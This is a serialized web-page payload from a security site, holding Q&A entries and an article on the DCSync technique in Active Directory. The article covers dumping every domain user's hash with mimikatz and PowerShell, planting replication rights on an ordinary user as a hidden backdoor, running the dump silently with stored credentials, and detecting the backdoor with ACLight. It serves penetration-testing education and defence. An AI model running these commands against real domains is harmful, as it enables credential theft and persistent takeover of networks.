[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f85QImpFYqQ12F3SjfxF_Pj_WV3MRn2vDBB7tQmWyokc":3},{"docs":4,"hasNextPage":53,"hasPrevPage":40,"limit":486,"nextPage":487,"page":22,"pagingCounter":22,"prevPage":32,"totalDocs":44,"totalPages":488},[5,59,78,97,116,135,154,173,192,211,230,250,270,290,310,365,389,413,438,462],{"id":6,"question":7,"answer":8,"answerHtml":9,"slug":10,"keywords":11,"article":12,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":58,"createdAt":58,"_status":57},1289,"How can defenders detect DCSync backdoors that grant replication rights to non-privileged users?","Defenders can use automated tools like ACLight, which enumerates ACLs in Active Directory to find privileged accounts that are not members of high-privilege groups (shadow admins). It generates reports like \"Privileged Accounts - Layers Analysis.txt\" to flag users with DCSync permissions. The article recommends using ACLight for this detection.","\u003Cp>Defenders can use automated tools like ACLight, which enumerates ACLs in Active Directory to find privileged accounts that are not members of high-privilege groups (shadow admins). It generates reports like &quot;Privileged Accounts - Layers Analysis.txt&quot; to flag users with DCSync permissions. The article recommends using ACLight for this detection.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-defenders-detect-dcsync-backdoors-that-grant-replication-rights-to-non-p-1777479976727","DCSync detection, ACLight, shadow admin, Active Directory ACL, privileged account monitoring",{"id":13,"title":14,"slug":15,"description":16,"content":17,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":37,"tags":41,"qaPairs":42,"meta":54,"updatedAt":55,"createdAt":56,"_status":57},299,"Domain Penetration - DCSync","domain-penetration-dcsync","Learn DCSync techniques for domain penetration: export user hashes, maintain persistence, and detect backdoors with open-source tools and methods.",{"root":18},{"type":19,"format":20,"indent":21,"version":22,"children":23,"direction":31},"root","",0,1,[24],{"type":25,"format":20,"indent":21,"version":22,"children":26,"direction":31},"paragraph",[27],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a frequently used technique in domain penetration. This article will compile open-source materials, combine personal experience, and summarize methods for exploitation, defense, and detection.\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following topics:\u003C\u002Fp>\u003Cul>\u003Cli>Method to export all domain user hashes using DCSync\u003C\u002Fli>\u003Cli>Method to maintain persistence within the domain using DCSync\u003C\u002Fli>\u003Cli>Automated detection methods for DCSync backdoors\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Method to export all domain user hashes using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>DCSync is a feature added to mimikatz in 2015, co-authored by Benjamin DELPY gentilkiwi and Vincent LE TOUX, capable of exporting hashes of all users within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Prerequisites:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain permissions for any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users in the Administrators group\u003C\u002Fli>\u003Cli>Users in the Domain Admins group\u003C\u002Fli>\u003Cli>Users in the Enterprise Admins group\u003C\u002Fli>\u003Cli>Computer account of the domain controller\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Utilize the DRS (Directory Replication Service) protocol to replicate user credentials from the domain controller via IDL_DRSGetNCChanges\u003C\u002Fp>\u003Cp>Reference materials:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fopenspecs\u002Fwindows_protocols\u002Fms-drsr\u002Ff977faaa-673e-4f66-b9bf-48c640241d47\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fgentilkiwi\u002Fmimikatz\u002Fblob\u002Fmaster\u002Fmimikatz\u002Fmodules\u002Flsadump\u002Fkuhl_m_lsadump_dc.c#L27\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Ch4>1. Use mimikatz\u003C\u002Fh4>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. PowerShell Implementation\u003C\u002Fh4>\u003Cp>https:\u002F\u002Fgist.github.com\u002Fmonoxgas\u002F9d238accd969550136db\u003C\u002Fp>\u003Cp>Calling the dcsync function in mimikatz.dll via Invoke-ReflectivePEinjection\u003C\u002Fp>\u003Cp>Export hashes of all users in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Export the hash of the administrator account in the domain:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Invoke-DCSync -DumpForest -Users @(\"administrator\") | ft -wrap -autosize\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>After obtaining the hashes of domain users, further exploitation can refer to previous articles:\u003C\u002Fp>\u003Cp>\"Domain Penetration - Implementation of Pass The Hash\"\u003C\u002Fp>\u003Cp>\"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin mode)\"\u003C\u002Fp>\u003Cp>\"Domain Penetration - Pass The Hash &amp; Pass The Key\"\u003C\u002Fp>\u003Ch2>0x03 Methods for Maintaining Domain Privileges Using DCSync\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Obtain the permissions of any of the following users:\u003C\u002Fp>\u003Cul>\u003Cli>Users within the Domain Admins group\u003C\u002Fli>\u003Cli>Users within the Enterprise Admins group\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Exploitation Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Add the following three ACEs (Access Control Entries) to a regular user in the domain:\u003C\u002Fp>\u003Cul>\u003Cli>DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)\u003C\u002Fli>\u003Cli>DS-Replication-Get-Changes (GUID: 89e95b76-444d-4c62-991a-0facbeda640c)\u003C\u002Fli>\u003C\u002Ful>\u003Cp>This user will then gain the permission to export all user hashes in the domain using DCSync\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FPowerShellMafia\u002FPowerSploit\u002Fblob\u002Fdev\u002FRecon\u002FPowerView.ps1#L8270\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The command to add ACEs is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Add-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Supplement:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Command to remove ACE:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>Remove-DomainObjectAcl -TargetIdentity \"DC=test,DC=com\" -PrincipalIdentity test1 -Rights DCSync -Verbose\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>For more information on ACLs, refer to the previous article: 'Penetration Techniques – Access Control List in Windows'\u003C\u002Fp>\u003Cp>The method to invoke DCSync using domain user test1 is as follows:\u003C\u002Fp>\u003Ch4>1. On a domain-joined host logged in as user test1, directly use the DCSync feature of mimikatz\u003C\u002Fh4>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch4>2. Use runas to log in as user test1, then perform DCSync\u003C\u002Fh4>\u003Cp>(1) Pop up a cmd window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 cmd\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the popped-up cmd window:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fall \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute without popping up a window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>echo 123456789 | runas \u002Fnoprofile \u002Fuser:test\\test1 c:\\test\\1.bat\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Similar tools include lsrunas, lsrunase, and CPAU\u003C\u002Fp>\u003Ch4>3. Using PowerShell to log in as user test1, then performing DCSync\u003C\u002Fh4>\u003Cp>(1) Launch cmd\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)\u003Cbr>Start-Process -FilePath \"cmd.exe\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Execute the following command in the launched cmd:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Implement without pop-up window\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$uname=\"test\\test1\"\u003Cbr>$pwd=ConvertTo-SecureString \"12345678\" -AsPlainText –Force\u003Cbr>$cred=New-Object System.Management.Automation.PSCredential($uname,$pwd)        \u003Cbr>Start-Process -FilePath \"c:\\test\\1.bat\" -Credential $cred\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The content of 1.bat is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>c:\\test\\mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\" exit&gt;c:\\test\\1.txt\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using wmic to log in as user test1 on the local machine will fail with the following error:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>ERROR:\u003Cbr>Description = User credentials cannot be used for local connections\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch2>0x04 Automated Detection Method for DCSync Backdoors\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Users with high privileges but not in high-privilege groups are referred to as Shadow Admins, such as the domain user test1 in 0x03. Simply querying members of high-privilege groups cannot reveal Shadow Admins within the domain.\u003C\u002Fp>\u003Cp>\u003Cstrong>Detection Principle:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Enumerate the ACLs of all users in Active Directory and flag privileged accounts.\u003C\u002Fp>\u003Cp>\u003Cstrong>Implementation Code:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fcyberark\u002FACLight\u003C\u002Fp>\u003Cp>\u003Cstrong>Exploitation Conditions:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cul>\u003Cli>Powershell v3.0\u003C\u002Fli>\u003Cli>Domain User Privileges\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Detection Method:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Execute Execute-ACLight2.bat from the project\u003C\u002Fp>\u003Cp>Three files will be generated:\u003C\u002Fp>\u003Cul>\u003Cli>Privileged Accounts - Layers Analysis.txt\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Final Report.csv\u003C\u002Fli>\u003Cli>Privileged Accounts Permissions - Irregular Accounts.csv\u003C\u002Fli>\u003C\u002Ful>\u003Cp>The files will display all privileged accounts\u003C\u002Fp>\u003Cp>Testing shows that ACLight can detect user test1 with DCSync permissions added\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the exploitation of DCSync in domain penetration and automated detection methods. From a defensive perspective, it is recommended to use ACLight to detect user ACLs in the domain environment\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr",null,"Onedaysec",4,"published","2026-02-02T07:25:19.682Z",{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},"DCSync Domain Penetration: Export Hashes & Persistence","DCSync, domain penetration, hash export, persistence, detection, mimikatz, PowerShell",false,[],{"docs":43,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],1288,1287,1286,1285,1284,1283,1282,1281,1280,true,{"title":32,"description":32,"image":32},"2026-07-24T02:07:12.184Z","2026-07-23T16:02:42.706Z","draft","2026-07-23T16:17:54.070Z",{"id":44,"question":60,"answer":61,"answerHtml":62,"slug":63,"keywords":64,"article":65,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":77,"createdAt":77,"_status":57},"What are some practical methods to execute DCSync from a domain-joined machine as a low-privileged user that has been given DCSync rights?","The user can run mimikatz directly if logged in, or use `runas` or PowerShell's `Start-Process` with credentials to execute a batch file containing the DCSync command. For example: `mimikatz.exe privilege::debug \"lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv\"`. Note that wmic cannot be used locally with alternate credentials. Refer to [Domain Penetration - Method to Export All Domain User Hashes Using DCSync](\u002Fnews\u002Fdomain-penetration-method-to-export-all-domain-user-hashes-using-dcsync) for more.","\u003Cp>The user can run mimikatz directly if logged in, or use `runas` or PowerShell&#39;s `Start-Process` with credentials to execute a batch file containing the DCSync command. For example: `mimikatz.exe privilege::debug &quot;lsadump::dcsync \u002Fdomain:test.com \u002Fuser:administrator \u002Fcsv&quot;`. Note that wmic cannot be used locally with alternate credentials. Refer to [Domain Penetration - Method to Export All Domain User Hashes Using DCSync](\u002Fnews\u002Fdomain-penetration-method-to-export-all-domain-user-hashes-using-dcsync) for more.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-are-some-practical-methods-to-execute-dcsync-from-a-domain-joined-machine-a-1777479976664","DCSync execution, runas, PowerShell, mimikatz, alternative credentials",{"id":13,"title":14,"slug":15,"description":16,"content":66,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":72,"tags":73,"qaPairs":74,"meta":76,"updatedAt":55,"createdAt":56,"_status":57},{"root":67},{"type":19,"format":20,"indent":21,"version":22,"children":68,"direction":31},[69],{"type":25,"format":20,"indent":21,"version":22,"children":70,"direction":31},[71],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":75,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:53.835Z",{"id":45,"question":79,"answer":80,"answerHtml":81,"slug":82,"keywords":83,"article":84,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":96,"createdAt":96,"_status":57},"How can an attacker maintain persistence in a domain using DCSync without being in high-privilege groups?","An attacker with Domain Admin privileges can add three specific ACEs (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes with a different GUID) to a regular user account using PowerShell tools like PowerView. This grants that user DCSync rights, creating a \"Shadow Admin\" that can export all domain hashes unnoticed.","\u003Cp>An attacker with Domain Admin privileges can add three specific ACEs (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes with a different GUID) to a regular user account using PowerShell tools like PowerView. This grants that user DCSync rights, creating a &quot;Shadow Admin&quot; that can export all domain hashes unnoticed.\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-maintain-persistence-in-a-domain-using-dcsync-without-being--1777479976587","DCSync persistence, Shadow Admin, ACE, PowerView, ACL",{"id":13,"title":14,"slug":15,"description":16,"content":85,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":91,"tags":92,"qaPairs":93,"meta":95,"updatedAt":55,"createdAt":56,"_status":57},{"root":86},{"type":19,"format":20,"indent":21,"version":22,"children":87,"direction":31},[88],{"type":25,"format":20,"indent":21,"version":22,"children":89,"direction":31},[90],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":94,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:53.643Z",{"id":46,"question":98,"answer":99,"answerHtml":100,"slug":101,"keywords":102,"article":103,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":115,"createdAt":115,"_status":57},"What is DCSync and what is its primary use in domain penetration?","DCSync is a feature in mimikatz that exploits the Directory Replication Service (DRS) protocol to replicate user credentials from a domain controller, allowing an attacker to export hashes of all domain users. It requires permissions like Domain Admins or a domain controller's computer account. For details, see [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync).","\u003Cp>DCSync is a feature in mimikatz that exploits the Directory Replication Service (DRS) protocol to replicate user credentials from a domain controller, allowing an attacker to export hashes of all domain users. It requires permissions like Domain Admins or a domain controller&#39;s computer account. For details, see [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-is-dcsync-and-what-is-its-primary-use-in-domain-penetration-1777479976524","DCSync, mimikatz, DRS, hash export, domain penetration",{"id":13,"title":14,"slug":15,"description":16,"content":104,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":110,"tags":111,"qaPairs":112,"meta":114,"updatedAt":55,"createdAt":56,"_status":57},{"root":105},{"type":19,"format":20,"indent":21,"version":22,"children":106,"direction":31},[107],{"type":25,"format":20,"indent":21,"version":22,"children":108,"direction":31},[109],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":113,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:53.391Z",{"id":47,"question":117,"answer":118,"answerHtml":119,"slug":120,"keywords":121,"article":122,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":134,"createdAt":134,"_status":57},"How can an attacker use a low-privilege user with DCSync rights to export domain hashes without interactive logon?","Using PowerShell, the attacker can start a process as the low-privilege user with Start-Process and -Credential, then execute mimikatz commands to dump hashes. Alternatively, runas with a batch file can run DCSync in the background, exporting results to a text file.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>Using PowerShell, the attacker can start a process as the low-privilege user with Start-Process and -Credential, then execute mimikatz commands to dump hashes. Alternatively, runas with a batch file can run DCSync in the background, exporting results to a text file.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-an-attacker-use-a-low-privilege-user-with-dcsync-rights-to-export-domain-1777477615590","DCSync, mimikatz, runas, PowerShell, credential delegation",{"id":13,"title":14,"slug":15,"description":16,"content":123,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":129,"tags":130,"qaPairs":131,"meta":133,"updatedAt":55,"createdAt":56,"_status":57},{"root":124},{"type":19,"format":20,"indent":21,"version":22,"children":125,"direction":31},[126],{"type":25,"format":20,"indent":21,"version":22,"children":127,"direction":31},[128],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":132,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:53.110Z",{"id":48,"question":136,"answer":137,"answerHtml":138,"slug":139,"keywords":140,"article":141,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":153,"createdAt":153,"_status":57},"What tool can automatically detect DCSync backdoors and other privileged accounts in Active Directory?","ACLight (from CyberArk) is a tool that enumerates all Active Directory ACLs and flags privileged accounts, including those with DCSync permissions. It requires PowerShell v3.0 and domain user privileges, producing reports that identify 'Shadow Admins' not in high-privilege groups.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>ACLight (from CyberArk) is a tool that enumerates all Active Directory ACLs and flags privileged accounts, including those with DCSync permissions. It requires PowerShell v3.0 and domain user privileges, producing reports that identify &#39;Shadow Admins&#39; not in high-privilege groups.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fdomain-penetration-dcsync\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","what-tool-can-automatically-detect-dcsync-backdoors-and-other-privileged-account-1777477615528","DCSync detection, ACLight, Shadow Admin, ACL audit",{"id":13,"title":14,"slug":15,"description":16,"content":142,"contentHtml":29,"cover":32,"author":33,"views":22,"readingTime":34,"status":35,"publishedAt":36,"seo":148,"tags":149,"qaPairs":150,"meta":152,"updatedAt":55,"createdAt":56,"_status":57},{"root":143},{"type":19,"format":20,"indent":21,"version":22,"children":144,"direction":31},[145],{"type":25,"format":20,"indent":21,"version":22,"children":146,"direction":31},[147],{"mode":28,"text":29,"type":30,"style":20,"detail":21,"format":21,"version":22},{"title":38,"description":16,"keywords":39,"ogImage":32,"canonicalUrl":32,"noIndex":40},[],{"docs":151,"hasNextPage":53},[6,44,45,46,47,48,49,50,51,52],{"title":32,"description":32,"image":32},"2026-07-23T16:17:52.782Z",{"id":49,"question":155,"answer":156,"answerHtml":157,"slug":158,"keywords":159,"article":160,"status":35,"aiModel":32,"aiConfidence":32,"updatedAt":172,"createdAt":172,"_status":57},"How can an attacker maintain domain persistence by adding DCSync rights to a regular user?","An attacker with Domain Admin or Enterprise Admin privileges can add three specific ACEs (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and another replication GUID) to a regular user's ACL. This grants the user DCSync rights, allowing them to export all domain hashes and persist as a 'Shadow Admin'.\n\n---\n**Related reading:**\n- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\n- [Webmin\u003C=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\n- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\n- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)","\u003Cp>An attacker with Domain Admin or Enterprise Admin privileges can add three specific ACEs (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and another replication GUID) to a regular user&#39;s ACL. This grants the user DCSync rights, allowing them to export all domain hashes and persist as a &#39;Shadow Admin&#39;.\u003Cbr>\u003Cbr>---\u003Cbr>**Related reading:**\u003Cbr>- [Domain Penetration - DCSync](\u002Fnews\u002Fdomain-penetration-dcsync) — original article\u003Cbr>- [Webmin&lt;=1.920-Unauthenticated_RCE(CVE-2019-15107) Exploitation Test](\u002Fnews\u002Fwebmin-1-920-unauthenticated-rce-cve-2019-15107-exploitation-test)\u003Cbr>- [Use powershell to find a writable windows service](\u002Fnews\u002Fuse-powershell-to-find-a-writable-windows-service)\u003Cbr>- [Windows Shellcode Study Notes - Extraction and Testing of Shellcode](\u002Fnews\u002Fwindows-shellcode-study-notes-extraction-and-testing-of-shellcode)\u003C\u002Fp>\u003Cp>\u003Ca 